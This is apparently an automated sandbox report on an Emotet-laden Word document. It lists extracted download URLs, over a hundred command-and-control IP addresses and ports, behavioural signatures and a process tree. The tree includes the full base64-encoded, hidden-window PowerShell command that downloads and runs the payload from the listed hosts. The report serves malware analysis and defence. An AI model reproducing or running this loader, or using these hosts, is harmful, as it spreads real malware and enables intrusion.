Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
27-01-2020 20:29
General
Malware Config
Extracted
https://fietsenmetkinderen.info/App_Data/ASHFouI/
https://rokonworld.xyz/cgi-bin/bf99ypv-nka70qs-62/
http://www.meubelontwerpstudioheyne.nl/languages/ndZNarqnj/
http://bursary.engsoc.queensu.ca/wp-admin/48ech-ddpjkzp-29821620/
http://lapmangfpt.haiphong.vn/wp-admin/k50i2cm5qi-9wnfau-7879373385/
Extracted
emotet
195.250.143.182:80
184.162.115.11:443
70.60.238.62:80
68.183.18.169:8080
178.62.75.204:8080
178.33.167.120:8080
144.76.56.36:8080
216.75.37.196:8080
78.189.165.52:8080
185.192.75.240:443
202.229.211.95:80
190.5.162.204:80
24.141.12.228:80
41.185.29.128:8080
192.210.217.94:8080
110.2.118.164:80
203.153.216.178:7080
37.70.131.107:80
75.86.6.174:80
122.176.116.57:443
88.247.53.159:443
75.127.14.170:8080
91.117.31.181:80
122.116.104.238:7080
177.103.240.93:80
179.5.118.12:8080
78.188.170.128:80
5.196.200.208:8080
41.215.79.182:80
82.146.55.23:7080
212.112.113.235:80
212.129.14.27:8080
187.72.47.161:443
42.51.192.231:8080
88.248.140.80:80
88.247.26.78:80
98.192.74.164:80
78.189.60.109:443
82.145.43.153:8080
182.74.249.74:80
80.211.32.88:8080
95.9.217.200:8080
72.27.212.209:8080
46.17.6.116:8080
160.226.171.255:443
81.82.247.216:80
81.214.142.115:80
69.30.205.162:7080
61.221.152.140:80
142.93.87.198:8080
160.119.153.20:80
175.181.7.188:80
153.183.25.24:80
180.33.71.88:80
182.176.116.139:995
77.74.78.80:443
186.84.173.136:8080
183.82.123.60:443
190.93.210.113:80
72.176.87.136:80
51.77.113.97:8080
172.104.70.207:8080
175.127.140.68:80
201.183.251.100:80
211.20.154.102:80
200.82.88.254:80
95.130.37.244:443
186.147.245.204:80
139.59.12.63:8080
58.185.224.18:80
70.45.30.28:80
220.247.70.174:80
195.201.56.70:8080
196.6.119.137:80
14.161.30.33:443
185.207.57.205:443
91.117.131.122:80
154.73.137.131:80
85.109.190.235:443
59.135.126.129:443
150.246.246.238:80
37.211.67.229:80
162.144.46.90:8080
177.144.130.105:443
176.58.93.123:80
78.210.132.35:80
78.46.87.133:8080
210.111.160.220:80
203.124.57.50:80
85.100.122.211:80
50.116.78.109:8080
88.225.230.33:80
98.178.241.106:80
23.253.207.142:8080
82.79.244.92:80
112.186.195.176:80
61.204.119.188:443
1.221.254.82:80
187.177.155.123:990
110.142.161.90:80
157.7.164.178:8081
1.217.126.11:443
78.186.102.195:80
163.172.107.70:8080
91.83.93.103:443
217.12.70.226:80
156.155.163.232:80
58.93.151.148:80
144.139.91.187:80
89.215.225.15:80
82.165.15.188:8080
183.91.3.63:80
190.17.94.108:443
37.46.129.215:8080
58.92.179.55:443
181.39.96.86:443
98.15.140.226:80
60.152.212.149:80
41.77.74.214:443
190.171.153.139:80
60.130.173.117:80
162.154.175.215:80
46.32.229.152:8080
183.87.40.21:8080
211.229.116.130:80
180.16.248.25:80
186.223.86.136:443
Signatures
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4996 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 3604 Powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
Powershell.exe491.exetimeouttargets.exedescription pid process target process PID 3604 wrote to memory of 4764 3604 Powershell.exe 491.exe PID 4764 wrote to memory of 4756 4764 491.exe 491.exe PID 4420 wrote to memory of 3724 4420 timeouttargets.exe timeouttargets.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
491.exetimeouttargets.exepid process 4756 491.exe 3724 timeouttargets.exe -
Drops file in System32 directory 1 IoCs
Processes:
491.exedescription ioc process File renamed C:\Users\Admin\491.exe => C:\Windows\SysWOW64\timeouttargets.exe 491.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXE491.exe491.exetimeouttargets.exetimeouttargets.exepid process 4996 WINWORD.EXE 4764 491.exe 4756 491.exe 4420 timeouttargets.exe 3724 timeouttargets.exe -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3604 5068 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 3604 Powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
491.exe491.exetimeouttargets.exetimeouttargets.exepid process 4764 491.exe 4756 491.exe 4420 timeouttargets.exe 3724 timeouttargets.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e16aaeed5f48de4896425925bfbdd114b6e826d637a742994234703ea8cd20ee.doc" /o ""1⤵
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABOAGcAZgBwAGwAaAB1AGcAcwA9ACcAWABlAGoAawBhAGIAbwBoACcAOwAkAE8AbABpAGUAcwBjAGEAZgBzAG0AIAA9ACAAJwA0ADkAMQAnADsAJABKAHUAZAB6AGIAdABpAGsAPQAnAFcAcgBjAG0AZABvAHgAcgB1AGsAJwA7ACQATAB2AGoAeABwAHMAaQBlAGkAeQBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAGwAaQBlAHMAYwBhAGYAcwBtACsAJwAuAGUAeABlACcAOwAkAEcAawB6AGoAcgB6AGQAZABmAGEAdwBqAD0AJwBNAGwAZgBiAHkAaAB6AHUAYQBuACcAOwAkAE0AcQBzAG8AZwBjAGQAawBiAHEAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBFAEIAYwBsAGkARQBuAHQAOwAkAE8AagBlAGEAZwBiAHkAYwBqAGcAeAA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBlAHQAcwBlAG4AbQBlAHQAawBpAG4AZABlAHIAZQBuAC4AaQBuAGYAbwAvAEEAcABwAF8ARABhAHQAYQAvAEEAUwBIAEYAbwB1AEkALwAqAGgAdAB0AHAAcwA6AC8ALwByAG8AawBvAG4AdwBvAHIAbABkAC4AeAB5AHoALwBjAGcAaQAtAGIAaQBuAC8AYgBmADkAOQB5AHAAdgAtAG4AawBhADcAMABxAHMALQA2ADIALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAGUAdQBiAGUAbABvAG4AdAB3AGUAcgBwAHMAdAB1AGQAaQBvAGgAZQB5AG4AZQAuAG4AbAAvAGwAYQBuAGcAdQBhAGcAZQBzAC8AbgBkAFoATgBhAHIAcQBuAGoALwAqAGgAdAB0AHAAOgAvAC8AYgB1AHIAcwBhAHIAeQAuAGUAbgBnAHMAbwBjAC4AcQB1AGUAZQBuAHMAdQAuAGMAYQAvAHcAcAAtAGEAZABtAGkAbgAvADQAOABlAGMAaAAtAGQAZABwAGoAawB6AHAALQAyADkAOAAyADEANgAyADAALwAqAGgAdAB0AHAAOgAvAC8AbABhAHAAbQBhAG4AZwBmAHAAdAAuAGgAYQBpAHAAaABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAGsANQAwAGkAMgBjAG0ANQBxAGkALQA5AHcAbgBmAGEAdQAtADcAOAA3ADkAMwA3ADMAMwA4ADUALwAnAC4AIgBzAFAATABgAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFgAbQByAHAAcwB5AG0AbwBuAHMAYQBzAGIAPQAnAFAAZAB3AHYAdABwAHMAYwBsACcAOwBmAG8AcgBlAGEAYwBoACgAJABCAG8AeABmAGwAZQB1AHYAIABpAG4AIAAkAE8AagBlAGEAZwBiAHkAYwBqAGcAeAApAHsAdAByAHkAewAkAE0AcQBzAG8AZwBjAGQAawBiAHEALgAiAEQAYABvAGAAdwBuAGwAYABPAEEARABmAEkATABlACIAKAAkAEIAbwB4AGYAbABlAHUAdgAsACAAJABMAHYAagB4AHAAcwBpAGUAaQB5AG8AKQA7ACQATQBqAHYAbQBrAG0AZAB0AGMAcQBtAHEAPQAnAFcAaQB4AHQAbABuAHoAcABiAGoAcQBlAHMAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABMAHYAagB4AHAAcwBpAGUAaQB5AG8AKQAuACIATABgAEUATgBgAGcAdABIACIAIAAtAGcAZQAgADMAMAAyADkANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABhAFIAdAAiACgAJABMAHYAagB4AHAAcwBpAGUAaQB5AG8AKQA7ACQASwBmAGMAYQBtAGMAcwBiAD0AJwBPAGkAZwBxAGQAbgBvAHgAdwBnAHYAJwA7AGIAcgBlAGEAawA7ACQAWgBzAHcAaQBsAHYAZgB1AD0AJwBYAGcAZwBuAGgAawB1AHAAdgBsACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAagBrAGYAZABwAHUAcQBjAGkAYgBmAGQAPQAnAFQAZwBnAGMAdAB6AHkAaQBqAHgAYQAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\491.exe"C:\Users\Admin\491.exe"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
-
C:\Users\Admin\491.exe--7c8dd3ca3⤵
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeouttargets.exe"C:\Windows\SysWOW64\timeouttargets.exe"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeouttargets.exe--c529e5132⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\491.exe
-
C:\Users\Admin\491.exe
-
C:\Users\Admin\491.exe
-
C:\Windows\SysWOW64\timeouttargets.exe
-
C:\Windows\SysWOW64\timeouttargets.exe
-
memory/3724-13-0x0000000000500000-0x0000000000517000-memory.dmpFilesize
92KB
-
memory/3724-14-0x0000000000400000-0x000000000045C000-memory.dmpFilesize
368KB
-
memory/4420-11-0x0000000000570000-0x0000000000587000-memory.dmpFilesize
92KB
-
memory/4756-8-0x0000000002020000-0x0000000002037000-memory.dmpFilesize
92KB
-
memory/4756-9-0x0000000000400000-0x000000000045C000-memory.dmpFilesize
368KB
-
memory/4764-6-0x0000000002280000-0x0000000002297000-memory.dmpFilesize
92KB